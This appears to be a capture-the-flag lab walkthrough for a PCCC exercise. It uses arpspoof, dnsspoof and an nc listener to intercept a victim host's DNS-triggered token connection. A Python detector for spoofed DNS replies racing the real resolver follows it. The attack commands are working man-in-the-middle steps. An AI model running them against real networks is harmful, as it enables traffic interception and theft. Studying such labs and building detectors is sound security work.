Token 4: DNS Followup TCP Token
Token: [CAPTURE VIA NC]
Objective
After a successful DNS lookup, dnsvictim.pccc sends this token to port 9001 at {token3}.target.pccc.
Hosts
- dnsvictim.pccc: 10.0.91.134
- dnsmasq.pccc: 10.0.91.133
- Target domain: PCCC-Domain-Name-Simian-02-95yA.target.pccc
Method: DNS Spoof + Listen on Port 9001
Step 1: Set up ARP spoofing
arpspoof -i eth1 -t 10.0.91.134 10.0.91.133 &
arpspoof -i eth1 -t 10.0.91.133 10.0.91.134 &
Step 2: Listen on port 9001
In a separate terminal:
nc -nlvp 9001
Step 3: Spoof DNS response
When the victim queries for PCCC-Domain-Name-Simian-02-95yA.target.pccc, respond with YOUR IP address (10.0.91.138 or your Kali IP).
Using dnsspoof:
# Create the dnsspoof hosts entry (attacker IP, then the token3 domain)
echo "10.0.91.138 PCCC-Domain-Name-Simian-02-95yA.target.pccc" > /tmp/dns.txt
dnsspoof -i eth1 -f /tmp/dns.txt
Or use a Python script with scapy to:
- Sniff DNS queries
- When query matches token3 domain, send spoofed response pointing to your IP
- The victim connects to your IP on port 9001 and sends the token
Step 4: Receive the token
The token arrives on your netcat listener on port 9001.
Why It Works
By spoofing the DNS response, you redirect the victim's connection to your machine. The ARP spoofing from Step 1 puts you in the path between dnsvictim.pccc and dnsmasq.pccc, so you see the victim's query for the token3 domain and can answer it yourself. The victim thinks it is connecting to the legitimate server but actually connects to you on port 9001 and sends the token.
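The detection-side counterpart, added here and not part of the write-up: a small pure-Python DNS parser plus a check that flags a query ID receiving two answers with different A records, which is what a forged reply racing the real dnsmasq.pccc answer looks like to a sensor watching the victim's traffic. The sample packets are constructed; the transaction ID and the legitimate address 10.0.91.140 are placeholders, since the write-up does not give them.

```python
import struct
# Constructed sample traffic for the write-up's domain: the spoofed reply that
# dnsspoof races in (attacker IP from the write-up) and the real resolver's
# reply (placeholder IP; the write-up does not give the legitimate address).
QNAME = "PCCC-Domain-Name-Simian-02-95yA.target.pccc"
SPOOFED_IP, LEGIT_IP = "10.0.91.138", "10.0.91.140"

def encode_name(name):
    return b"".join(bytes([len(lab)]) + lab.encode() for lab in name.split(".")) + b"\x00"
def build_dns(txid, qname, answer_ip=None):
    """Minimal DNS A query (answer_ip=None) or response carrying one A record."""
    flags, ancount = (0x8180, 1) if answer_ip else (0x0100, 0)
    msg = struct.pack("!HHHHHH", txid, flags, 1, ancount, 0, 0)
    msg += encode_name(qname) + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN
    if answer_ip:  # answer name is a pointer (0xC00C) back to the question name
        msg += b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 60, 4) + bytes(map(int, answer_ip.split(".")))
    return msg
def decode_name(msg, off):
    """Decode a possibly compressed name; return (name, offset just past it)."""
    labels, end = [], None
    while (n := msg[off]) != 0:
        if n & 0xC0 == 0xC0:  # compression pointer: follow it, resume after its 2 bytes
            end, off = end or off + 2, struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
        else:
            labels.append(msg[off + 1:off + 1 + n].decode()); off += n + 1
    return ".".join(labels), end or off + 1
def parse_dns(msg):
    """Return (txid, is_response, qname, [IPv4 addresses from A answers])."""
    txid, flags, _qd, an = struct.unpack("!HHHH", msg[:8])
    qname, off = decode_name(msg, 12); off += 4  # one question; skip QTYPE/QCLASS
    ips = []
    for _ in range(an):
        _, off = decode_name(msg, off)
        rtype, _, _, rdlen = struct.unpack("!HHIH", msg[off:off + 10]); off += 10
        if rtype == 1 and rdlen == 4:  # A record
            ips.append(".".join(str(b) for b in msg[off:off + 4]))
        off += rdlen
    return txid, bool(flags & 0x8000), qname, ips

def detect_conflicting_answers(packets):
    """Alert when one (txid, qname) receives replies with differing A records (spoof race)."""
    seen, alerts = {}, []
    for pkt in packets:
        txid, is_resp, qname, ips = parse_dns(pkt)
        if is_resp and ips:
            prev = seen.setdefault((txid, qname.lower()), set())
            if prev and not set(ips) <= prev:
                alerts.append((txid, qname, sorted(prev | set(ips))))
            prev.update(ips)
    return alerts
SAMPLE = [build_dns(0x1A2B, QNAME), build_dns(0x1A2B, QNAME, SPOOFED_IP),
          build_dns(0x1A2B, QNAME, LEGIT_IP)]  # query, spoofed reply, real reply
```

Feed the UDP payloads of captured port-53 traffic to detect_conflicting_answers; a single (txid, qname) with two different A answers is the race signature, and a resolver that is not the configured dnsmasq.pccc in the source address is a second, independent indicator.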
Cleanup
pkill arpspoof
pkill dnsspoof